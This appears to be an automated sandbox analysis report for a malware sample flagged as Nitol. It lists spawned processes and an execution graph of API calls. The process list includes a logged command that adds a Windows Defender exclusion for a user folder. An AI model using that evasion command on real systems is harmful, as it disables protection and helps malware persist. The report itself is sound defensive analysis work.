                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:37
                                                  Start time:22:51:15
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff690400000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:38
                                                  Start time:22:51:15
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff602720000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:39
                                                  Start time:22:51:15
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:40
                                                  Start time:22:51:16
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\reg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7641c0000
                                                  File size:77'312 bytes
                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:41
                                                  Start time:22:51:45
                                                  Start date:05/01/2025
                                                  Path:C:\Program Files (x86)\qNHTRl\qNHTRl.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\qNHTRl\qNHTRl.exe"
                                                  Imagebase:0x810000
                                                  File size:54'152 bytes
                                                  MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Has exited:false

                                                  Target ID:42
                                                  Start time:22:51:47
                                                  Start date:05/01/2025
                                                  Path:C:\Program Files (x86)\qNHTRl\qNHTRl.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\qNHTRl\qNHTRl.exe"
                                                  Imagebase:0x810000
                                                  File size:54'152 bytes
                                                  MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:43
                                                  Start time:22:51:48
                                                  Start date:05/01/2025
                                                  Path:C:\Program Files (x86)\2U36F\NroRNr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\2U36F\NroRNr.exe"
                                                  Imagebase:0xfa0000
                                                  File size:54'152 bytes
                                                  MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Has exited:true

                                                  Target ID:44
                                                  Start time:22:51:49
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /c echo.>c:\xxxx.ini
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:45
                                                  Start time:22:51:49
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:46
                                                  Start time:22:52:01
                                                  Start date:05/01/2025
                                                  Path:C:\Program Files (x86)\2U36F\NroRNr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\2U36F\NroRNr.exe"
                                                  Imagebase:0xfa0000
                                                  File size:54'152 bytes
                                                  MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:47
                                                  Start time:22:52:02
                                                  Start date:05/01/2025
                                                  Path:C:\Program Files (x86)\qNHTRl\qNHTRl.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\qNHTRl\qNHTRl.exe"
                                                  Imagebase:0x810000
                                                  File size:54'152 bytes
                                                  MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:2.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:32%
                                                    Total number of Nodes:462
                                                    Total number of Limit Nodes:10
                                                    execution_graph 14003 140005df3 14004 140005e71 14003->14004 14005 140005e84 CreateFileA 14004->14005 14006 140005f50 _CreateFrameInfo 14005->14006 14007 140005fc3 malloc ReadFile 14006->14007 15136 140007412 15138 140007333 15136->15138 15137 140007403 15138->15137 15139 1400073e0 LdrLoadDll 15138->15139 15139->15138 15906 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15909 1400054e0 15906->15909 15908 1400136ef 15910 14000552c 15909->15910 15913 140005506 sprintf_s 15909->15913 15911 1400074d0 LdrLoadDll 15910->15911 15912 140005536 15911->15912 15914 140008370 3 API calls 15912->15914 15913->15908 15918 140005545 _CreateFrameInfo 15914->15918 15915 1400055b8 15916 140008de0 _lock 2 API calls 15915->15916 15917 1400055c0 sprintf_s 15916->15917 15917->15913 15918->15915 15919 1400074f0 LdrLoadDll 15918->15919 15920 140005561 CreateThread 15919->15920 15920->15917 15921 1400055b0 GetLastError 15920->15921 15921->15915 14012 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 14013 140005add GetVersionExA 14012->14013 14016 140005ab1 14012->14016 14014 140005b0e GetProcessHeap HeapFree 14013->14014 14015 140005af0 GetProcessHeap HeapFree 14013->14015 14022 140005b3c 14014->14022 14020 140005d0b 14015->14020 14017 140005abf 14016->14017 14062 140009540 14016->14062 14070 140009300 14017->14070 14021 140005ac9 14081 140008510 GetModuleHandleA 14021->14081 14085 14000a310 HeapCreate 14022->14085 14025 140005bec 14026 140005c12 14025->14026 14027 140005bf0 14025->14027 14031 140005c17 14026->14031 14028 140005bfe 14027->14028 14029 140009540 _lock 12 API calls 14027->14029 14030 140009300 _lock 10 API calls 14028->14030 14029->14028 14033 140005c08 14030->14033 14032 140005c3d 14031->14032 14034 140005c29 14031->14034 14036 140009540 _lock 12 API calls 14031->14036 14088 140009f50 GetStartupInfoA 14032->14088 14035 140008510 _lock 3 API calls 14033->14035 14037 140009300 _lock 10 API calls 14034->14037 14035->14026 14036->14034 14038 140005c33 14037->14038 14040 140008510 _lock 3 API calls 14038->14040 14040->14032 14042 140005c56 14108 140009e30 14042->14108 14045 140005c5b 14126 140009c30 14045->14126 14049 140005c73 14050 140005c81 14049->14050 14051 1400084e0 _lock 12 API calls 14049->14051 14156 140009690 14050->14156 14051->14050 14053 140005c86 14054 140005c94 14053->14054 14055 1400084e0 _lock 12 API calls 14053->14055 14168 140008650 14054->14168 14055->14054 14057 140005c9e 14058 1400084e0 _lock 12 API calls 14057->14058 14059 140005ca9 14057->14059 14058->14059 14172 140001520 14059->14172 14061 140005ad3 14061->14020 14063 14000954e _lock 14062->14063 14064 14000959c 14063->14064 14066 14000961c 14063->14066 14067 1400095c9 GetStdHandle 14063->14067 14065 140009300 _lock 10 API calls 14064->14065 14065->14066 14066->14017 14067->14064 14068 1400095dc 14067->14068 14068->14064 14069 1400095e2 WriteFile 14068->14069 14069->14064 14072 140009320 _lock 14070->14072 14071 140009330 14071->14021 14072->14071 14073 1400094dc GetStdHandle 14072->14073 14076 140009375 _lock 14072->14076 14073->14071 14074 1400094ef 14073->14074 14074->14071 14075 1400094f5 WriteFile 14074->14075 14075->14071 14076->14071 14077 1400093b9 GetModuleFileNameA 14076->14077 14078 1400093d9 _lock 14077->14078 14190 14000f000 14078->14190 14082 140008543 ExitProcess 14081->14082 14083 14000852a GetProcAddress 14081->14083 14083->14082 14084 14000853f 14083->14084 14084->14082 14086 14000a334 14085->14086 14087 14000a339 HeapSetInformation 14085->14087 14086->14025 14087->14025 14216 140008370 14088->14216 14090 140008370 3 API calls 14094 140009f8a 14090->14094 14091 14000a1c4 GetStdHandle 14100 14000a17c 14091->14100 14092 14000a239 SetHandleCount 14099 140005c48 14092->14099 14093 14000a1d8 GetFileType 14093->14100 14094->14090 14097 14000a0e3 14094->14097 14094->14099 14094->14100 14095 14000a11c GetFileType 14095->14097 14097->14095 14097->14099 14097->14100 14221 14000edc0 14097->14221 14098 14000edc0 _lock 3 API calls 14098->14100 14099->14042 14101 1400084e0 14099->14101 14100->14091 14100->14092 14100->14093 14100->14098 14100->14099 14102 140009540 _lock 12 API calls 14101->14102 14103 1400084ed 14102->14103 14104 140009300 _lock 10 API calls 14103->14104 14105 1400084f4 14104->14105 14106 1400073e0 _lock LdrLoadDll 14105->14106 14107 140008500 14106->14107 14109 140009e7c 14108->14109 14110 140009e3e GetCommandLineW 14108->14110 14111 140009e81 GetCommandLineW 14109->14111 14112 140009e69 14109->14112 14113 140009e49 GetCommandLineW 14110->14113 14114 140009e5e GetLastError 14110->14114 14111->14112 14115 140009e75 14112->14115 14116 140009e91 GetCommandLineA MultiByteToWideChar 14112->14116 14113->14114 14114->14112 14114->14115 14115->14045 14117 140009ec8 14116->14117 14118 140009ed9 14116->14118 14117->14045 14119 140008370 3 API calls 14118->14119 14120 140009eeb 14119->14120 14121 140009f32 14120->14121 14122 140009ef3 MultiByteToWideChar 14120->14122 14121->14045 14123 140009f13 14122->14123 14124 140009f2a 14122->14124 14123->14045 14235 140008de0 14124->14235 14127 140009c52 GetEnvironmentStringsW 14126->14127 14128 140009c86 14126->14128 14131 140009c6c GetLastError 14127->14131 14136 140009c60 14127->14136 14129 140009c91 GetEnvironmentStringsW 14128->14129 14130 140009c77 14128->14130 14132 140005c67 14129->14132 14129->14136 14130->14132 14133 140009d09 GetEnvironmentStrings 14130->14133 14131->14128 14131->14130 14152 1400099c0 GetModuleFileNameW 14132->14152 14133->14132 14134 140009d17 14133->14134 14135 140009d58 14134->14135 14138 140009d20 MultiByteToWideChar 14134->14138 14139 140008370 3 API calls 14135->14139 14240 140008300 14136->14240 14138->14132 14138->14134 14141 140009d68 14139->14141 14144 140009d7d 14141->14144 14145 140009d70 FreeEnvironmentStringsA 14141->14145 14142 140009ce1 __SehTransFilter 14147 140009cef FreeEnvironmentStringsW 14142->14147 14143 140009cd1 FreeEnvironmentStringsW 14143->14132 14146 140009de5 FreeEnvironmentStringsA 14144->14146 14148 140009d90 MultiByteToWideChar 14144->14148 14145->14132 14146->14132 14147->14132 14148->14144 14149 140009e0e 14148->14149 14150 140008de0 _lock 2 API calls 14149->14150 14151 140009e16 FreeEnvironmentStringsA 14150->14151 14151->14132 14155 140009a03 14152->14155 14153 140008300 _lock 17 API calls 14154 140009bca 14153->14154 14154->14049 14155->14153 14155->14154 14157 1400096b2 14156->14157 14158 1400096a8 14156->14158 14159 140008370 3 API calls 14157->14159 14158->14053 14167 1400096fa 14159->14167 14160 140009709 14160->14053 14161 1400097a5 14162 140008de0 _lock 2 API calls 14161->14162 14163 1400097b4 14162->14163 14163->14053 14164 140008370 3 API calls 14164->14167 14165 1400097e5 14166 140008de0 _lock 2 API calls 14165->14166 14166->14163 14167->14160 14167->14161 14167->14164 14167->14165 14169 140008666 14168->14169 14171 1400086bf 14169->14171 14256 140005380 14169->14256 14171->14057 14173 140001565 14172->14173 14174 140001569 14173->14174 14175 14000157e 14173->14175 14294 140001430 GetModuleFileNameW OpenSCManagerW 14174->14294 14178 140001595 OpenSCManagerW 14175->14178 14179 14000164f 14175->14179 14180 1400015b2 GetLastError 14178->14180 14181 1400015cf OpenServiceW 14178->14181 14182 140001654 14179->14182 14183 140001669 StartServiceCtrlDispatcherW 14179->14183 14180->14061 14184 140001611 DeleteService 14181->14184 14185 1400015e9 GetLastError CloseServiceHandle 14181->14185 14303 1400011f0 14182->14303 14183->14061 14187 140001626 CloseServiceHandle CloseServiceHandle 14184->14187 14188 14000161e GetLastError 14184->14188 14185->14061 14187->14061 14188->14187 14191 14000f01e _lock 14190->14191 14192 14000f03b LoadLibraryA 14191->14192 14193 14000f125 _lock 14191->14193 14194 14000f054 GetProcAddress 14192->14194 14195 1400094c9 14192->14195 14207 14000f165 14193->14207 14213 1400073e0 LdrLoadDll 14193->14213 14194->14195 14196 14000f06d _lock 14194->14196 14195->14021 14201 14000f075 GetProcAddress 14196->14201 14198 1400073e0 _lock LdrLoadDll 14198->14195 14199 1400073e0 _lock LdrLoadDll 14205 14000f1e9 14199->14205 14203 140007220 _lock 14201->14203 14202 1400073e0 _lock LdrLoadDll 14202->14207 14204 14000f094 GetProcAddress 14203->14204 14206 14000f0b3 _lock 14204->14206 14208 1400073e0 _lock LdrLoadDll 14205->14208 14210 14000f1a3 _lock 14205->14210 14206->14193 14209 14000f0e9 GetProcAddress 14206->14209 14207->14199 14207->14210 14208->14210 14211 14000f101 _lock 14209->14211 14210->14198 14211->14193 14212 14000f10d GetProcAddress 14211->14212 14212->14193 14214 140007333 14213->14214 14214->14213 14215 140007403 14214->14215 14215->14202 14217 1400083a0 14216->14217 14219 1400083e0 14217->14219 14220 1400083be Sleep 14217->14220 14227 14000e850 14217->14227 14219->14094 14220->14217 14220->14219 14222 1400073e0 _lock LdrLoadDll 14221->14222 14223 14000edec _lock 14222->14223 14224 14000ee1d _lock 14223->14224 14225 14000ee26 GetModuleHandleA 14223->14225 14224->14097 14225->14224 14226 14000ee38 GetProcAddress 14225->14226 14226->14224 14228 14000e865 14227->14228 14229 14000e8be HeapAlloc 14228->14229 14231 14000e876 sprintf_s 14228->14231 14232 1400090b0 14228->14232 14229->14228 14229->14231 14231->14217 14233 1400073e0 _lock LdrLoadDll 14232->14233 14234 1400090c5 14233->14234 14234->14228 14236 140008de9 HeapFree 14235->14236 14239 140008e19 _lock 14235->14239 14237 140008dff sprintf_s 14236->14237 14236->14239 14238 140008e09 GetLastError 14237->14238 14238->14239 14239->14121 14241 140008320 14240->14241 14243 140008358 14241->14243 14244 140008338 Sleep 14241->14244 14245 1400090f0 14241->14245 14243->14142 14243->14143 14244->14241 14244->14243 14246 14000919e 14245->14246 14251 140009103 14245->14251 14247 1400090b0 _lock LdrLoadDll 14246->14247 14249 1400091a3 sprintf_s 14247->14249 14248 14000914c HeapAlloc 14248->14251 14255 140009173 sprintf_s 14248->14255 14249->14241 14250 140009540 _lock 12 API calls 14250->14251 14251->14248 14251->14250 14252 1400090b0 _lock LdrLoadDll 14251->14252 14253 140009300 _lock 10 API calls 14251->14253 14254 140008510 _lock 3 API calls 14251->14254 14251->14255 14252->14251 14253->14251 14254->14251 14255->14241 14259 140005250 14256->14259 14258 140005389 14258->14171 14260 140005271 14259->14260 14261 1400073e0 _lock LdrLoadDll 14260->14261 14262 14000527e 14261->14262 14263 1400073e0 _lock LdrLoadDll 14262->14263 14264 14000528d 14263->14264 14270 1400052f0 _lock 14264->14270 14271 140008490 14264->14271 14266 1400052b5 14267 1400052d9 14266->14267 14266->14270 14274 140008400 14266->14274 14269 140008400 7 API calls 14267->14269 14267->14270 14269->14270 14270->14258 14272 1400084c5 HeapSize 14271->14272 14273 140008499 sprintf_s 14271->14273 14273->14266 14276 140008430 14274->14276 14277 140008472 14276->14277 14278 140008450 Sleep 14276->14278 14279 14000e920 14276->14279 14277->14267 14278->14276 14278->14277 14280 14000e935 14279->14280 14281 14000e94c 14280->14281 14291 14000e95e 14280->14291 14282 140008de0 _lock 2 API calls 14281->14282 14285 14000e951 14282->14285 14283 14000e9b1 14284 1400090b0 _lock LdrLoadDll 14283->14284 14287 14000e9b9 _lock sprintf_s 14284->14287 14285->14276 14286 14000e973 HeapReAlloc 14286->14287 14286->14291 14287->14276 14288 14000e9f4 sprintf_s 14290 14000e9f9 GetLastError 14288->14290 14289 1400090b0 _lock LdrLoadDll 14289->14291 14290->14287 14291->14283 14291->14286 14291->14288 14291->14289 14292 14000e9db sprintf_s 14291->14292 14293 14000e9e0 GetLastError 14292->14293 14293->14287 14295 140001482 CreateServiceW 14294->14295 14296 14000147a GetLastError 14294->14296 14298 1400014ea GetLastError 14295->14298 14299 1400014df CloseServiceHandle 14295->14299 14297 1400014fd 14296->14297 14309 140004f30 14297->14309 14300 1400014f2 CloseServiceHandle 14298->14300 14299->14300 14300->14297 14302 14000150d 14302->14061 14304 1400011fa 14303->14304 14318 1400051d0 14304->14318 14307 140004f30 sprintf_s NtAllocateVirtualMemory 14308 140001262 14307->14308 14308->14061 14311 140004f39 _CreateFrameInfo 14309->14311 14310 140004f44 14310->14302 14311->14310 14314 140006c95 14311->14314 14313 14000660e sprintf_s 14313->14302 14315 140006d9d 14314->14315 14317 140006d7b 14314->14317 14315->14313 14316 140006f95 NtAllocateVirtualMemory 14316->14315 14317->14315 14317->14316 14321 140008270 14318->14321 14320 140001238 MessageBoxW 14320->14307 14322 14000827e 14321->14322 14323 1400082ac sprintf_s 14321->14323 14322->14323 14325 140008120 14322->14325 14323->14320 14326 14000816a 14325->14326 14330 14000813b sprintf_s 14325->14330 14328 1400081d7 14326->14328 14326->14330 14331 140007f50 14326->14331 14329 140007f50 sprintf_s 54 API calls 14328->14329 14328->14330 14329->14330 14330->14323 14336 140007f69 sprintf_s 14331->14336 14332 140007f74 sprintf_s 14332->14328 14333 14000801d 14334 1400080d5 14333->14334 14335 14000802f 14333->14335 14337 14000cc00 sprintf_s 54 API calls 14334->14337 14338 14000804c 14335->14338 14340 140008081 14335->14340 14336->14332 14336->14333 14344 14000cd50 14336->14344 14341 140008056 14337->14341 14347 14000cc00 14338->14347 14340->14341 14355 14000c2a0 14340->14355 14341->14328 14345 140008300 _lock 17 API calls 14344->14345 14346 14000cd6a 14345->14346 14346->14333 14348 14000cc3f 14347->14348 14351 14000cc23 sprintf_s 14347->14351 14348->14351 14363 14000fc50 14348->14363 14351->14341 14353 14000ccc5 sprintf_s 14408 14000fd20 LeaveCriticalSection 14353->14408 14356 14000c2e0 14355->14356 14362 14000c2c3 sprintf_s 14355->14362 14357 14000fc50 sprintf_s 25 API calls 14356->14357 14356->14362 14358 14000c34e 14357->14358 14359 14000c1f0 sprintf_s 2 API calls 14358->14359 14360 14000c367 sprintf_s 14358->14360 14359->14360 14442 14000fd20 LeaveCriticalSection 14360->14442 14362->14341 14364 14000fc96 14363->14364 14365 14000fccb 14363->14365 14409 14000b400 14364->14409 14366 14000ccac 14365->14366 14367 14000fccf EnterCriticalSection 14365->14367 14366->14353 14373 14000c3f0 14366->14373 14367->14366 14375 14000c42e 14373->14375 14393 14000c427 sprintf_s 14373->14393 14374 140004f30 sprintf_s NtAllocateVirtualMemory 14376 14000cbe6 14374->14376 14379 14000c4fb sprintf_s _CreateFrameInfo 14375->14379 14375->14393 14436 14000c1f0 14375->14436 14376->14353 14378 14000c841 14380 14000c86a 14378->14380 14381 14000cb20 WriteFile 14378->14381 14379->14378 14382 14000c526 GetConsoleMode 14379->14382 14384 14000c936 14380->14384 14390 14000c876 14380->14390 14383 14000cb53 GetLastError 14381->14383 14381->14393 14382->14378 14385 14000c557 14382->14385 14383->14393 14386 14000ca02 14384->14386 14387 14000c940 14384->14387 14385->14378 14388 14000c564 GetConsoleCP 14385->14388 14392 14000ca57 WideCharToMultiByte 14386->14392 14386->14393 14397 14000cab0 WriteFile 14386->14397 14387->14393 14394 14000c991 WriteFile 14387->14394 14388->14393 14405 14000c581 sprintf_s 14388->14405 14389 14000c8c5 WriteFile 14389->14390 14391 14000c928 GetLastError 14389->14391 14390->14389 14390->14393 14391->14393 14392->14386 14395 14000cb15 GetLastError 14392->14395 14393->14374 14394->14387 14396 14000c9f4 GetLastError 14394->14396 14395->14393 14396->14393 14397->14386 14398 14000caf6 GetLastError 14397->14398 14398->14386 14398->14393 14399 14000fd50 7 API calls sprintf_s 14399->14405 14400 14000c649 WideCharToMultiByte 14400->14393 14401 14000c68c WriteFile 14400->14401 14403 14000c80d GetLastError 14401->14403 14401->14405 14402 14000c829 GetLastError 14402->14393 14403->14393 14404 14000c6e2 WriteFile 14404->14405 14406 14000c7ff GetLastError 14404->14406 14405->14393 14405->14399 14405->14400 14405->14402 14405->14404 14407 14000c81b GetLastError 14405->14407 14406->14393 14407->14393 14410 14000b41e 14409->14410 14411 14000b42f EnterCriticalSection 14409->14411 14415 14000b2f0 14410->14415 14413 14000b423 14413->14411 14414 1400084e0 _lock 12 API calls 14413->14414 14414->14411 14416 14000b317 14415->14416 14417 14000b32e 14415->14417 14418 140009540 _lock 12 API calls 14416->14418 14419 14000b342 sprintf_s 14417->14419 14421 140008300 _lock 17 API calls 14417->14421 14420 14000b31c 14418->14420 14419->14413 14422 140009300 _lock 10 API calls 14420->14422 14423 14000b350 14421->14423 14424 14000b324 14422->14424 14423->14419 14425 14000b400 _lock 22 API calls 14423->14425 14426 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14424->14426 14427 14000b371 14425->14427 14426->14417 14428 14000b3a7 14427->14428 14429 14000b379 14427->14429 14431 140008de0 _lock HeapFree GetLastError 14428->14431 14430 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14429->14430 14432 14000b386 14430->14432 14435 14000b392 sprintf_s 14431->14435 14434 140008de0 _lock HeapFree GetLastError 14432->14434 14432->14435 14433 14000b3b0 LeaveCriticalSection 14433->14419 14434->14435 14435->14433 14437 14000c20c sprintf_s 14436->14437 14438 14000c212 sprintf_s 14437->14438 14439 14000c22c SetFilePointer 14437->14439 14438->14379 14440 14000c24a GetLastError 14439->14440 14441 14000c254 sprintf_s 14439->14441 14440->14441 14441->14379 14008 140006c95 14009 140006d9d 14008->14009 14011 140006d7b 14008->14011 14010 140006f95 NtAllocateVirtualMemory 14010->14009 14011->14009 14011->14010 16515 7ffda58011b0 16525 7ffda5801209 16515->16525 16516 7ffda5801b90 51 API calls 16533 7ffda5801300 BuildCatchObjectHelperInternal 16516->16533 16517 7ffda58014f0 16543 7ffda5801a40 16517->16543 16518 7ffda5801b70 _log10_special 8 API calls 16521 7ffda58014d3 16518->16521 16519 7ffda58012c7 16524 7ffda5801b90 51 API calls 16519->16524 16520 7ffda580129e 16523 7ffda58014f6 16520->16523 16534 7ffda5801b90 16520->16534 16546 7ffda5801110 16523->16546 16528 7ffda58012b9 BuildCatchObjectHelperInternal 16524->16528 16525->16517 16525->16519 16525->16520 16525->16528 16525->16533 16528->16516 16531 7ffda58014eb 16532 7ffda58079cc _invalid_parameter_noinfo_noreturn 47 API calls 16531->16532 16532->16517 16533->16518 16535 7ffda5801b9b 16534->16535 16536 7ffda58012b0 16535->16536 16537 7ffda5807a4c __std_exception_copy 2 API calls 16535->16537 16538 7ffda5801bba 16535->16538 16536->16528 16536->16531 16537->16535 16541 7ffda5801bc5 16538->16541 16552 7ffda58021f0 16538->16552 16540 7ffda5801110 Concurrency::cancel_current_task 51 API calls 16542 7ffda5801bcb 16540->16542 16541->16540 16561 7ffda5801b34 16543->16561 16547 7ffda580111e Concurrency::cancel_current_task 16546->16547 16548 7ffda5803990 Concurrency::cancel_current_task 2 API calls 16547->16548 16549 7ffda580112f 16548->16549 16550 7ffda580379c __std_exception_copy 49 API calls 16549->16550 16551 7ffda5801159 16550->16551 16553 7ffda58021fe Concurrency::cancel_current_task 16552->16553 16556 7ffda5803990 16553->16556 16555 7ffda580220f 16557 7ffda58039af 16556->16557 16558 7ffda58039fa RaiseException 16557->16558 16559 7ffda58039d8 RtlPcToFileHeader 16557->16559 16558->16555 16560 7ffda58039f0 16559->16560 16560->16558 16566 7ffda5801ab0 16561->16566 16564 7ffda5803990 Concurrency::cancel_current_task 2 API calls 16565 7ffda5801b56 16564->16565 16567 7ffda580379c __std_exception_copy 49 API calls 16566->16567 16568 7ffda5801ae4 16567->16568 16568->16564 14443 1400054e0 14444 14000552c 14443->14444 14447 140005506 sprintf_s 14443->14447 14456 1400074d0 14444->14456 14448 140008370 3 API calls 14452 140005545 _CreateFrameInfo 14448->14452 14449 1400055b8 14450 140008de0 _lock 2 API calls 14449->14450 14451 1400055c0 sprintf_s 14450->14451 14451->14447 14452->14449 14460 1400074f0 14452->14460 14455 1400055b0 GetLastError 14455->14449 14458 140007333 14456->14458 14457 140005536 14457->14448 14458->14457 14459 1400073e0 LdrLoadDll 14458->14459 14459->14458 14462 140007333 14460->14462 14461 140005561 CreateThread 14461->14451 14461->14455 14462->14461 14463 1400073e0 LdrLoadDll 14462->14463 14463->14462

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 152 140006f89-140006f8e 151->152 153 140006eef-140006f23 151->153 157 140006f95-140006fd6 NtAllocateVirtualMemory 152->157 158 140006f90 152->158 155 140006f25-140006f2d 153->155 156 140006f2f-140006f33 153->156 159 140006f37-140006f7a 155->159 156->159 157->132 160 140006fdc-140007020 157->160 158->132 161 140006f84 159->161 162 140006f7c-140006f80 159->162 163 14000702c-140007037 160->163 161->151 162->161 165 140007039-140007058 163->165 166 14000705a-140007062 163->166 165->163 168 14000706e-14000707b 166->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 171 140007096-1400070a9 169->171 172 1400070ab 169->172 173 1400072e2-1400072eb 170->173 174 140007164-14000717a 170->174 171->172 175 1400070ad-1400070db 171->175 176 140007064-14000706a 172->176 174->173 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@
                                                    • API String ID: 0-149943524
                                                    • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                    • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                    • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                    • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
